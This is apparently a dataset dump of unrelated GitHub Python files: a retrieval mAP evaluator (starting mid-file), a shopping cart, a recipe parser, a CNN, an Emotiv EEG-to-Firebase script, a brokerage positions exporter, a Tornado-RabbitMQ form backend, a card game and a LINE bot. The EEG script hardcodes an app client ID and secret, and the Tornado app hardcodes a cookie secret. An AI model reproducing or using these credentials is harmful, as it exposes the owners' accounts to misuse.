delg_ap(tp_flag, gt_num):\n \"\"\"DELG official code for mAP, the convention for the Revisited\n Oxford/Paris datasets.\n \"\"\"\n\n positive_ranks = np.where(tp_flag == 1)[0]\n average_precision = 0.0\n\n num_expected_positives = gt_num\n if not num_expected_positives:\n return average_precision\n\n recall_step = 1.0 / num_expected_positives\n for i, rank in enumerate(positive_ranks):\n if not rank:\n left_precision = 1.0\n else:\n left_precision = i / rank\n\n right_precision = (i + 1) / (rank + 1)\n average_precision += (left_precision + right_precision) * recall_step / 2\n\n return average_precision\n\n @staticmethod\n def retrieval_ap(tp_flag, gt_num):\n \"\"\"Retrieval mAP, widely used in person reid.\n \"\"\"\n\n positive_ranks = np.where(tp_flag == 1)[0]\n average_precision = 0.0\n\n num_expected_positives = gt_num\n if not num_expected_positives:\n return average_precision\n\n recall_step = 1.0 / num_expected_positives\n for i, rank in 
enumerate(positive_ranks):\n right_precision = (i + 1) / (rank + 1)\n average_precision += right_precision * recall_step\n\n return average_precision\n\n def _vis_query(self, query_large_path, query_bbox, save_dir):\n \"\"\"Vis query.\"\"\"\n\n img = self.draw_bbox(query_large_path, query_bbox, (255, 0, 0))\n if query_bbox is not None:\n cv2.putText(img, 'query',\n (int(query_bbox[0]), int(query_bbox[1])),\n cv2.FONT_HERSHEY_COMPLEX, 2, (0, 0, 255), 2)\n cv2.imwrite(os.path.join(save_dir, 'query.jpg'), img)\n\n @staticmethod\n def draw_bbox(image_path, bbox, color):\n \"\"\"Draw bbox.\"\"\"\n\n img = cv2.imread(image_path)\n if bbox is not None:\n [x1, y1, x2, y2] = bbox # pylint:disable=invalid-name\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), color, 2)\n return img\n\n # pylint: disable=too-many-locals\n def _vis_gallery(self, trimmed_pred, save_dir):\n \"\"\"Vis gallery.\"\"\"\n\n [tp_flag, pred_info, valid_flag] = trimmed_pred\n bbox_list = pred_info['pred_bboxes'][valid_flag]\n sim = pred_info['sorted_sim'][valid_flag]\n image_ids = pred_info['image_ids'][valid_flag]\n for index, image_name in enumerate(image_ids):\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n sim_str = '%.4f' % sim[index]\n gal_bbox = bbox_list[index].astype('int')\n prefix = image_name.replace('/', '_')[:-4]\n string = f'{gal_bbox[0]}_{gal_bbox[1]}_{gal_bbox[2]}_{gal_bbox[3]}'\n save_name = f'{sim_str}_{prefix}_bbox_{string}.jpg'\n old_path = os.path.join(self.search_dir,\n short_dir,\n image_name)\n if not tp_flag[index] and index < self.VIS_TOPK:\n img = self.draw_bbox(old_path, gal_bbox, (255, 0, 0))\n elif tp_flag[index]:\n img = self.draw_bbox(old_path, gal_bbox, (0, 255, 0))\n save_name = save_name.split('.jpg')[0] + '_matched.jpg'\n else:\n continue\n cv2.putText(img, sim_str, (int(gal_bbox[0]), int(gal_bbox[1])),\n cv2.FONT_HERSHEY_COMPLEX, 2, (0, 0, 255), 2)\n cv2.imwrite(os.path.join(save_dir, save_name), img)\n\n def _vis_unmatched(self, unmatched_data_list, save_dir):\n \"\"\"Vis unmatched results beyond top-k.\"\"\"\n\n for unmatched_data in unmatched_data_list:\n image_name = unmatched_data['image_name']\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n save_name = 'missed_' + image_name.replace('/', '_')\n image_path = os.path.join(self.search_dir,\n short_dir,\n image_name)\n img = self.draw_bbox(image_path, unmatched_data['bbox'],\n (0, 0, 255))\n cv2.imwrite(os.path.join(save_dir, save_name), img)\n\n def get_unmatched(self, query_instance_id, gt_matched_flag):\n \"\"\"Get unmatched gt.\"\"\"\n\n query_bbox_dic = self.query_instance_dic[query_instance_id]\n gt_data_list = query_bbox_dic['pos_gallery_list']\n unmatched_gt_name_list = []\n for image_name in gt_matched_flag:\n if gt_matched_flag[image_name] == 0:\n unmatched_gt_name_list.append(image_name)\n unmatched_data_list = []\n for gt_data in gt_data_list:\n image_name = gt_data['image_name']\n if image_name in unmatched_gt_name_list:\n unmatched_data_list.append(gt_data)\n return unmatched_data_list\n\n def vis_retrieval(self, query_instance_id, unmatched_data_list,\n trimmed_pred):\n \"\"\"Vis retrieval.\"\"\"\n\n image_name = self.query_instance_dic[query_instance_id]['image_name']\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n query_large_path = os.path.join(self.query_dir, short_dir, image_name)\n save_dir = 
f'./tests/images/vis_pred/{query_instance_id}/'\n if os.path.exists(save_dir):\n shutil.rmtree(save_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n query_bbox = None\n self._vis_query(query_large_path, query_bbox, save_dir)\n self._vis_gallery(trimmed_pred, save_dir)\n self._vis_unmatched(unmatched_data_list, save_dir)\n\n def get_matching_flag(self, gt_info, pred_info):\n \"\"\"Get matching flag\"\"\"\n\n image_ids = pred_info['image_ids']\n sorted_sim = pred_info['sorted_sim']\n ignore_list = gt_info['ignore_list']\n gt_bbox_dic = gt_info['gt_bbox_dic']\n gt_matched_flag = gt_info['gt_matched_flag']\n\n gt_name_list = list(gt_bbox_dic.keys())\n valid_flag = np.zeros(len(image_ids))\n tp_flag = valid_flag.copy()\n fp_flag = valid_flag.copy()\n thrs = valid_flag.copy()\n for rank, image_name in enumerate(image_ids):\n if image_name not in ignore_list:\n valid_flag[rank] = 1\n thrs[rank] = sorted_sim[rank]\n if image_name in gt_name_list:\n tp_flag[rank] = 1.\n gt_matched_flag[image_name] = 1\n else:\n fp_flag[rank] = 1.\n tp_flag = tp_flag[valid_flag > 0]\n fp_flag = fp_flag[valid_flag > 0]\n thrs = thrs[valid_flag > 0]\n valid_flag = np.where(valid_flag>0)[0]\n return tp_flag, fp_flag, thrs, gt_matched_flag, valid_flag\n\n\ndef main():\n \"\"\"Main method\"\"\"\n\n all_reid_info = pickle.load(open('submission.pkl', 'rb'))\n\n cbir_evaluator = CBIREvaluator()\n cbir_evaluator.eval_data(all_reid_info)\n cbir_evaluator.output_final_result()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WesleyZhang1991/Google_Landmark_Retrieval_2021_2nd_Place_Solution","sub_path":"submission/eval/eval_cbir.py","file_name":"eval_cbir.py","file_ext":"py","file_size_in_byte":22428,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"48"} +{"seq_id":"14987771880","text":"\"\"\"This is main logic.\"\"\"\n\nfrom second_logic import userDisplayMenuWindow, userWindow, catalogView, shopping, temp\n\n\ndef user_id():\n \"\"\"This function works with the entered id.\n \"\"\"\n userDisplayMenuWindow()\n p_id = int(input(\"\\nEnter the id : \"))\n\n\ndef removeCart():\n \"\"\"This function is responsible for removing an item from the shopping cart.\n \"\"\"\n try:\n if temp == []:\n print(\"\\n====================\")\n print(\"\\\"Cart is empty\\\"\")\n if temp != []:\n order_del = input(\"To remove the entire order, enter - \\\"d\\\": \")\n if order_del == \"d\":\n temp.clear()\n for i in shopping:\n if i[\"Available\"] < c:\n i[\"Available\"] += 1\n print(\"=========================\")\n print(\"\\\"Cart has been emptied\\\"\")\n print(\"=========================\")\n else:\n print(\"\\n\\\"The items in the cart have not been removed\\\"\")\n print(\"\\\"Please select Cancel order and press - \\\"d\\\":\\n\")\n \n except UnboundLocalError:\n print(\"\\\"Please add an item\\\"\")\n print(\"======================\\n\")\n\n\ndef payOrder(temp):\n \"\"\"This function is responsible for the purchase of goods.\n \"\"\"\n sumTotal = 0\n if temp == []:\n print(\"\\n=================================\")\n print(\"Select a product and add to cart\")\n print(\"=================================\\n\")\n userDisplayMenuWindow()\n userWindow()\n userChoiceOptions()\n else:\n for i in temp:\n for key, value in i.items():\n if key == \"Available\":\n continue\n print(key, value)\n if key == \"Price\":\n sumTotal += i.get(\"Price\")\n print('==============')\n print(f\"Total cost: {sumTotal}\", \"\\n\")\n print(\"\\\"Thanks for shopping\\\"\\n\")\n\n\ndef 
placeOrder():\n \"\"\"This function is responsible for adding the product to the cart.\n \"\"\"\n order_number = 0\n userDisplayMenuWindow()\n p_id = int(input(\"\\nEnter the id : \"))\n\n for d in shopping:\n if d[\"id\"] == p_id:\n print(\"\\nId\\tName\\tAvailable\\tPrice\")\n print(\"=============================================================\")\n print(f'{d[\"id\"]}\\t{d[\"Name\"]}\\t{d[\"Available\"]}\\t\\t{d[\"Price\"]}')\n conform = input(\"\\nDo you want to place an order on the above shown product : Y/N \")\n \n if d[\"Available\"] == 0:\n print(\"\\n\"\"===============================\")\n print(\"\\\"This position is not available\\\"\")\n userWindow()\n userChoiceOptions()\n break\n \n if conform == 'Y' or conform == 'y':\n print(\"\\nSuccessfully placed the order on the product {} {}\".format(d[\"id\"], d[\"Name\"]))\n order_number += 1\n print(\"Your order number is : \", order_number, \"\\n\")\n global c\n c = d[\"Available\"]\n d[\"Available\"] -= 1\n temp.append(d)\n print(\"=============\")\n print(\"Shopping cart\")\n print(\"=============\")\n catalogView(temp)\n break\n\n elif conform == 'N' or conform == 'n':\n print(\"\\\"The order is not placed. You can carry on with you purchase. To add an order choose \\\"Place order.\\\"\\n\\\"Happy shopping!!!!\\\"\")\n break\n else:\n print(\"\\nYou have entered wrong option. Please enter again\\n\")\n conform = input(\"\\nDo you want to place an order on the above shown product : Y/N \")\n print(\"\\\"Please - enter the id :\\\"\\n\")\n placeOrder()\n break\n\n if d[\"id\"] != p_id:\n print(\"\\n\\\"You have entered invalid id. Please enter valid id\\\"\\n\")\n user_id()\n\n\ndef userChoiceOptions():\n \"\"\"This function is responsible for the choice of the user.\n \"\"\"\n try:\n choice = int(input(\"Please enter user choice : \"))\n if choice == 1:\n userDisplayMenuWindow()\n print(\"\\n===================================================\\n\")\n userWindow()\n print(\"\\n===================================================\\n\")\n userChoiceOptions()\n elif choice == 2:\n placeOrder()\n print(\"\\n===================================================\\n\")\n userWindow()\n print(\"\\n===================================================\\n\")\n userChoiceOptions()\n elif choice == 3:\n payOrder(temp)\n elif choice == 4:\n removeCart()\n userDisplayMenuWindow()\n userWindow()\n userChoiceOptions()\n elif choice == 5:\n print(\"\\n\\\"Thank you for visiting our shop.\\\"\\n\")\n exit()\n else:\n print(\"\\n\\\"Please enter valid choice\\\"\\n\")\n userWindow()\n userChoiceOptions()\n except ValueError:\n print(\"\\n\\\"Invalid Choice. 
Please enter valid choice\\\"\")\n userWindow()\n userChoiceOptions()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Vadeika/Task6/main_logic.py","file_name":"main_logic.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10066379364","text":"import re\nimport spacy\n\nfrom METHODS import METHODS\nfrom fuzzywuzzy import fuzz\n\nnlp = spacy.load('en_core_web_sm')\n\ntest_ingredients = ['18 medium taco shells','2 pounds lean ground beef','1 (14 ounce) bottle ketchup','1 (8 ounce) package shredded Cheese','1 large tomato, diced','1 cup iceberg lettuce, shredded', '3 1/4 cups fusilli pasta','2 tablespoons butter','2 tablespoons all-purpose flour','2 cups milk','1 1/2 cups shredded Cheddar cheese, divided','3 teaspoons lemon juice','1/2 teaspoon mustard powder',' salt and ground black pepper to taste','15 ounces tuna packed in water, drained and flaked','1/4 cup dry bread crumbs']\n\ningred1 = ['18 medium taco shells','2 pounds lean ground beef','1 (14 ounce) bottle ketchup','1 (8 ounce) package shredded Cheese','1 large tomato, diced','1 cup iceberg lettuce, shredded']\ndirections1 = ['Preheat oven to 375 degrees F (190 degrees C).',\n 'Warm taco shells for 5 minutes on the center rack in the preheated oven.',\n 'In a medium skillet over medium high heat, brown the beef. Halfway through browning, pour in ketchup. Stir well and let simmer for 5 minutes.',\n 'Spoon the meat mixture into the warm taco shells and top with Cheddar cheese. Return the filled taco shells to the preheated oven and bake until cheese is melted. Top each taco with a little tomato and lettuce.']\n\nMEAT_SPECIFIC_VERBS = [ 'trim', 'trimmed']\n\ndef find_nouns(doc):\n nouns = []\n for tok in [tok for tok in doc if tok.dep_ == 'compound' and tok.pos_ != 'VERB']: # Get list of compounds in doc\n noun = doc[tok.i: tok.head.i + 1]\n nouns.append(str(noun))\n for tok in doc:\n if tok.pos_ == \"NOUN\" and len(tok.text) > 2:\n nouns.append(str(tok))\n return nouns\n\n\nclass Ingredient:\n def __init__(self, qty, unit, item, comments = None, qty_details = None, additional_prep = None):\n self.qty = qty\n self.qty_details = qty_details\n self.unit = unit\n self.item = item\n self.comments = comments\n self.additional_prep = additional_prep\n\n def show(self):\n print(' ')\n print('qty: ',self.qty,\n '\\nqty_details: ',self.qty_details,\n '\\nunit: ',self.unit,\n '\\nitem: ',self.item,\n '\\ncomment: ',self.comments, '\\n\\n')\n print(' ')\n print('--------------------------------')\n\nUNITWORDS = set(['can','jar','pound','ounce','cup','packet', 'package', 'bottle','pinch','teaspoon','tablespoon','head','bunch','bundle','leaves','leaf','leave','sprig','piece','spoonful','pint','quart','gallon','stalk','spear','sheet','bar','cube','block','loaf','wheel','slice','ear','pod','clove','cluster'])\nTOOLS = set(['pan','pot','oven','bowl','blender','wok','skillet','fryer','grill','steamer','cooker','range','maker','iron'])\nTIME = set(['hour','minute','second','overnight'])\nMETHODS = set(METHODS)\n\ndef cut_s(string):\n s = string\n if s.endswith('s'): s = s[:-1]\n return(s)\n\ndef str_to_frac(string):\n t = string.split('/')\n return round(int(t[0])/int(t[1]),2)\n\ndef parse_additional_prep(item):\n if ',' in item:\n comment = item.split(',')[-1]\n doc = nlp(comment)\n for tok in doc:\n if tok.text in MEAT_SPECIFIC_VERBS:\n return ''\n if tok.pos_ == 'VERB':\n return ',' + comment\n return ''\n\n\n\ndef 
parse_ingredients(ingreds):\n paren_pat = re.compile(r'\\((.*?)\\)')\n\n parsed_ingreds = []\n\n for line in ingreds:\n # all the vars we need for Ingredient class\n qty = 0\n qty_details = ''\n unit = ''\n item = ''\n comments = ''\n\n # look for parentheses, take them out, place whats in them in the qty_details\n if re.search(paren_pat,line):\n qty_details = re.search(paren_pat,line).group(0)\n qty_details = qty_details[1:len(qty_details)-1]\n line = re.sub(r'\\((.*?)\\)', '', line)\n\n\n # look for numbers, put them in qty\n number = re.search('\\d*\\s*[^A-Za-z]*', line).group(0)\n for num in number.split():\n if '/' in num:\n num = str_to_frac(num)\n else:\n num = int(num)\n qty = qty + num\n if qty == 0:\n qty = ''\n\n line = re.sub('[0-9]+\\s*[^A-Za-z]*', '', line)\n\n # look for unit words\n if cut_s(line.split()[0]) in UNITWORDS:\n unit = line.split()[0]\n line = ' '.join(line.split()[1:])\n\n item = line\n # # split string on ',' for item and comment\n # if re.search('to taste', line):\n # line = re.sub('to taste', ' ', line)\n # comments += 'to taste'\n # line = line.split(',')\n # item = line[0]\n # try:\n # comments += line[1]\n # except: pass\n additional_prep = parse_additional_prep(line)\n\n\n parsed_ingreds.append(Ingredient(qty,unit,item,comments,qty_details, additional_prep = additional_prep))\n\n return(parsed_ingreds)\n\n\n# parsed = parse_ingredients(test_ingredients)\n\n# for i in parsed:\n# i.show()\n\nclass Main_step:\n def __init__(self):\n self.source = None\n self.substeps = None\n\n def show(self):\n print(\"----------MAIN STEP--------------\\n\")\n print(\"Source: \", self.source)\n print(' ')\n for ss in self.substeps:\n ss.show()\n\n\nclass Sub_step:\n def __init__(self, ingredients = None, tools=None, time=None, method=None,source = None):\n self.source = source\n self.method = method\n self.ingredients= ingredients\n self.tools = tools\n self.time = time\n\n def show(self):\n print(\" ----------SUB STEP--------------\\n\")\n print(' source: ', self.source)\n print(' method: ', self.method)\n print(' ingredients: ', self.ingredients)\n print(' tools: ', self.tools)\n print(' time: ', self.time)\n print(' ')\n\n# INGREDS = parse_ingredients(ingreds)\n\ndef split_into_substeps(directions):\n split_steps = []\n\n for step in directions:\n main = Main_step()\n main.source = step\n parsed_substeps = []\n\n for substep in step.split('.')[:-1]:\n ss_obj = Sub_step()\n ss_obj.source = substep\n parsed_substeps.append(ss_obj)\n\n main.substeps = parsed_substeps\n split_steps.append(main)\n return split_steps\n\ndef substeps_with_addons(directions, ingredient_objs):\n split_steps = []\n ingredient_nouns = sorted(set([i.item for i in ingredient_objs]), key=len)\n\n for step in directions:\n main = Main_step()\n main.source = step\n parsed_substeps = []\n\n for substep in step.split('.')[:-1]:\n #actual step\n ss_obj = Sub_step()\n ss_obj.source = substep\n \n \n nouns = []\n doc = nlp(substep)\n nouns += find_nouns(doc)\n \n sorted_nouns = sorted(set(nouns), key=len, reverse=True)\n \n #ingredients in each step\n mappings = []\n for noun in sorted_nouns:\n for i in ingredient_nouns:\n if fuzz.partial_ratio(noun, i) > 90 and len(noun) <= len(i):\n mappings.append(noun)\n \n ss_obj.ingredients = mappings\n \n #find tools\n tools = []\n for word in substep.split():\n if cut_s(word).lower() in TOOLS:\n tools.append(word)\n ss_obj.tools = tools\n \n #time\n time = []\n for i in range(len(substep.split())):\n word = substep.split()[i].lower()\n if cut_s(word) in TIME:\n if 
word == 'overnight':\n time.append('overnight')\n else:\n prev = ''\n try:\n prev = substep.split()[i-1]\n except: \n prev = 'a couple'\n time.append(prev + ' ' + word)\n ss_obj.time = time\n \n methods = []\n for word in substep.split():\n \n if word.capitalize() in METHODS:\n methods.append(word)\n ss_obj.method = methods\n \n parsed_substeps.append(ss_obj)\n\n main.substeps = parsed_substeps\n split_steps.append(main)\n return split_steps\n\ndef compute_ingredient_name_mappings(ingredient_objs, steps):\n ingredient_nouns = sorted(set([i.item for i in ingredient_objs]), key=len)\n nouns = []\n for step in steps:\n for ss in step.substeps:\n doc = nlp(ss.source)\n nouns += find_nouns(doc)\n\n sorted_nouns = sorted(set(nouns), key=len, reverse=True)\n\n mappings = []\n for noun in sorted_nouns:\n for i in ingredient_nouns:\n if fuzz.partial_ratio(noun, i) > 90 and len(noun) <= len(i):\n mappings.append((noun, i))\n return mappings\n","repo_name":"sdobon/NLP-recipe-transformer","sub_path":"parsers2.py","file_name":"parsers2.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31752034940","text":"import torch\nimport torch.nn as nn\n\n\nclass CNN(nn.Module):\n def __init__(self, p, a, b):\n super().__init__()\n\n layers = []\n for i in range(3 * a):\n in_channels = p if i == 0 else 32 * b\n layers += [\n nn.Conv1d(in_channels=in_channels, out_channels=32 * b, kernel_size=p, padding='same'),\n nn.ReLU(),\n nn.BatchNorm1d(32 * b)\n ]\n\n self.__block1 = nn.Sequential(*layers)\n\n layers = []\n for i in range(3 * a):\n in_channels = 1 if i == 0 else 32 * b\n\n layers += [\n nn.Conv2d(in_channels=in_channels, out_channels=32 * b, kernel_size=(3, 3), padding='same'),\n nn.ReLU(),\n nn.BatchNorm2d(32 * b)\n ]\n\n self.__block2 = nn.Sequential(*layers)\n\n layers = [\n # nn.AvgPool2d(kernel_size=(32 * b)),\n nn.Linear(32 * b * p, 2),\n nn.Sigmoid(),\n ]\n\n self.__block3 = nn.Sequential(*layers)\n\n def forward(self, bs_location: torch.Tensor, angles: list[torch.Tensor], toa: torch.Tensor):\n x = torch.cat([toa[:, :, None], bs_location[:, :, :2], *angles], dim=2)\n\n x = torch.permute(x, (0, 2, 1))\n\n x = x[:, None, :, :]\n\n x = self.__block2(x)\n\n x = torch.mean(x, dim=-1)\n x = torch.flatten(x, start_dim=1)\n\n out = self.__block3(x)\n\n return out\n","repo_name":"YerevaNN/NLOS-Localization-WAIR-D","sub_path":"src/networks/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41719910497","text":"import firebase_admin\nfrom firebase_admin import credentials, db\n\nfrom cortex import Cortex\n\nclass LiveMode():\n def __init__(self, app_client_id, app_client_secret, **kwargs):\n self.c = Cortex(app_client_id, app_client_secret, debug_mode = False, **kwargs)\n\n self.c.bind(create_session_done = self.on_create_session_done)\n self.c.bind(query_profile_done = self.on_query_profile_done)\n self.c.bind(load_unload_profile_done = self.on_load_unload_profile_done)\n self.c.bind(save_profile_done = self.on_save_profile_done)\n\n self.c.bind(new_com_data = self.on_new_com_data)\n self.c.bind(new_met_data = self.on_new_met_data)\n\n def start(self, profile_name, headsetId = ''):\n if profile_name == '':\n raise ValueError('Empty profile_name. 
The profile_name cannot be empty.')\n\n self.profile_name = profile_name\n self.c.set_wanted_profile(profile_name)\n\n if headsetId != '':\n self.c.set_wanted_headset(headsetId)\n\n self.c.open()\n\n def load_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'load')\n\n def unload_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'unload')\n\n def save_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'save')\n\n # Callback functions\n def on_create_session_done(self, *args, **kwargs):\n self.c.query_profile()\n\n def on_query_profile_done(self, *args, **kwargs):\n self.profile_lists = kwargs.get('data')\n\n if self.profile_name in self.profile_lists:\n self.c.get_current_profile()\n else:\n self.c.setup_profile(self.profile_name, 'create')\n\n def on_load_unload_profile_done(self, *args, **kwargs):\n is_loaded = kwargs.get('isLoaded')\n print(\"on_load_unload_profile_done: \" + str(is_loaded))\n \n if is_loaded == True:\n self.save_profile(self.profile_name)\n else:\n print('The profile ' + self.profile_name + ' is unloaded')\n self.profile_name = ''\n\n def on_save_profile_done(self, *args, **kwargs):\n print('Save profile ' + self.profile_name + \" successfully\")\n\n stream = ['com', 'met']\n self.c.subscribe_request(stream)\n\n def on_new_met_data(self, *args, **kwargs):\n data = kwargs.get('data')\n\n if data['met'][11] == True:\n state = \"focus\"\n elif data['met'][7] == True:\n state = \"relaxation\"\n elif data['met'][5] == True:\n state = \"stress\"\n else:\n # No recognized state in this sample; skip the update so 'state' is never unbound\n return\n \n ref = db.reference('/')\n ref.update({\n 'met/state': state\n })\n \n def on_new_com_data(self, *args, **kwargs):\n data = kwargs.get('data')\n action = data['action']\n\n ref = db.reference('/')\n ref.update({\n 'com/action': action\n })\n\ndef main():\n Firebase_credentials = credentials.Certificate('Firebase_credentials.json')\n\n firebase_admin.initialize_app(Firebase_credentials, {\n 'databaseURL': \"https://raspberrypi-health-default-rtdb.asia-southeast1.firebasedatabase.app/\"\n })\n\n your_app_client_id = 'TT5dWgW0bgYlQgZ6UKWFUbePXsQQ05p4v5ydoWl1'\n your_app_client_secret = 'XPTyv26CgjTcVSBGJJBiVsj3hY1xAvsZK48GkVFgIuZp5WpuuR4S0reujyvLKkKDYDTz4gOSLHNejhXHV4sxnFptPBvdKfyzsNKlUk54p0HMWqMveIPSLBcDjZV4GZfk'\n \n trained_profile_name = 'BCI'\n\n l = LiveMode(your_app_client_id, your_app_client_secret)\n l.start(trained_profile_name)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tanhtr/Healthcare","sub_path":"live_mode.py","file_name":"live_mode.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71459055507","text":"# viewPositions.py\n# 2022-07-19 created by ClimberMel\n# Used content from getPositions and getHoldings variations\n# I have removed all the unneeded code for just viewing and writing to csv all my combined holdings.\n# This currently (2022-11-20) both displays in a dataframe and writes it out to a CSV file\n# 2023-04-03: Modified to use new parms.json format for connection\n\nfrom ib_insync import *\nimport pandas as pd\nimport datetime as dt\nimport file\n\nparms = file.read_json(\"parms/parms.json\")\npconnect = parms['connect']\n\nib = IB()\nib.connect(pconnect["ip"], pconnect["port"], clientId=pconnect["id"])\n\npos = ib.positions()\n\nposition = [] # temporary list to hold element from pos during parsing\nmyPositions = [] # create a list of my combined positions\n\nheader = ['Account', 'Alias', 'secType', 'conId', 'Symbol', 'Exchange', 
'Currency', 'localSymbol', 'tradingClass', 'Position', 'avgCost', 'ContractMonth', 'Strike', 'Right', 'Multiplier']\nx = dt.datetime.now() # get current datetime\nnow_str = x.strftime('%Y-%m-%d_%H-%M')\n\naccounts = file.read_json(\"parms/accounts.json\")\n\n#None can be used as a place holder for rows that have missing elements\nfor s in pos:\n position.clear() # reset the temporary row before parsing the next position\n if s.contract.secType == 'STK':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, s.contract.exchange, s.contract.currency, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, None, None, None, None]\n myPositions.append(position)\n elif s.contract.secType == 'OPT':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, None, s.contract.currency, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, s.contract.lastTradeDateOrContractMonth, s.contract.strike, s.contract.right, s.contract.multiplier]\n myPositions.append(position)\n elif s.contract.secType == 'CASH':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, None, None, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, None, None, None, None]\n myPositions.append(position)\n else: print('ERROR: unhandled secType:', s.contract.secType)\n\nprint('Start process')\n\npositions = pd.DataFrame(myPositions, columns = header)\n\n# Using DataFrame.to_string() to print without index\ndfh = positions.to_string(index=False)\n\n# Write DataFrame to CSV File with Default params.\noutput_folder = 'output/'\npositions.to_csv(output_folder + now_str + \" positions.csv\", index=False)\n\nprint(dfh)\n\nprint('End process. File saved to: ' + output_folder + now_str + \" positions.csv\")\nib.disconnect()\n","repo_name":"ClimberMel/ib_tools","sub_path":"code/positions_toCSV.py","file_name":"positions_toCSV.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36063499615","text":"import json\r\nimport os\r\n\r\nimport pika\r\n\r\nimport tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\n\r\nAMQP_URL = os.environ.get('AMQP_URL')\r\n\r\nclass PikaClient:\r\n def __init__(self, queue):\r\n self.queue = queue\r\n parameters = pika.URLParameters(AMQP_URL)\r\n self.connection = pika.BlockingConnection(parameters)\r\n self.channel = self.connection.channel()\r\n self.channel.queue_declare(queue=self.queue, durable=True)\r\n\r\n def message_send(self, json_data):\r\n self.channel.basic_publish(exchange='',\r\n routing_key=self.queue,\r\n body=json_data,\r\n properties=pika.BasicProperties(\r\n delivery_mode=pika.spec.PERSISTENT_DELIVERY_MODE\r\n ))\r\n\r\n def connection_off(self):\r\n self.connection.close()\r\n\r\n\r\nclass Application(tornado.web.Application):\r\n def __init__(self):\r\n handlers = [\r\n (r\"/\", RootHandler),\r\n (r\"/send\", SendHandler),\r\n ]\r\n settings = dict(\r\n template_path=\"./src/templates/\",\r\n static_path=\"./src/static/\",\r\n xsrf_cookies=True,\r\n cookie_secret=\"262b44b297e695f78dcff3b56c8f43ac36235696\"\r\n )\r\n tornado.web.Application.__init__(self, handlers, **settings)\r\n\r\n\r\nclass RootHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render(\"rootHandler.html\")\r\n\r\n\r\nclass SendHandler(tornado.web.RequestHandler):\r\n def post(self):\r\n data = {'last_name': self.get_argument(\"last-name\", default=None, 
strip=False),\r\n 'first_name': self.get_argument(\"first-name\", default=None, strip=False),\r\n 'patronymic': self.get_argument(\"patronymic\", default=None, strip=False),\r\n 'phone': self.get_argument(\"phone\", default=None, strip=False),\r\n 'complaint_text': self.get_argument(\"appeal\", default=None, strip=False)}\r\n json_data = json.dumps(data, ensure_ascii=False).encode(\"UTF-8\")\r\n\r\n self.write(f\"На сервер отправлено:{json_data.decode()}\")\r\n\r\n # Message initialization\r\n message = PikaClient(queue=\"task_queue\")\r\n message.message_send(json_data=json_data)\r\n message.connection_off()\r\n\r\n self.set_status(202)\r\n\r\n\r\ndef main():\r\n print('services running, press ctrl+c to stop')\r\n ioloop = tornado.ioloop.IOLoop.instance()\r\n app = Application()\r\n\r\n app.listen(80, \"0.0.0.0\")\r\n ioloop.start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"GlukVet/WebApplication","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13296122399","text":"from game import Game2v2\n\ngame = Game2v2()\ngame.show_cards()\n\nid = 0\n\nlast_play_id = -1\n\nwhile(True):\n if last_play_id==id:\n game.new_turn()\n print(\"trun of player\", id)\n cards = game.see_cards(id)\n print(\"cards of player\", id, \":\", cards)\n if game.check_play(id):\n print(\"can play a card\")\n card = game.play_card(id)\n print(\"play card: \", card)\n last_play_id = id\n if game.check_win()>-1:\n break\n id = id+1 if id<3 else 0\n\nprint(\"winner: player\", id)","repo_name":"SakuraDawnRain/RLNPC","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24839450336","text":"import json\n\n# import requests\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,ImageMessage\n)\n\nfrom linebot.models import (FollowEvent,UnfollowEvent)\nfrom controllers.line_bot_handler import LineBotController\nimport os\nimport watchtower, logging\n\nline_bot_api = LineBotApi(os.environ.get('LINE_CHANNEL_ACCESS_TOKEN'))\nhandler = WebhookHandler(os.environ.get('LINE_CHANNEL_SECRET'))\n\n# log 紀錄\nlogging.basicConfig(level=logging.INFO)\nline_logger = 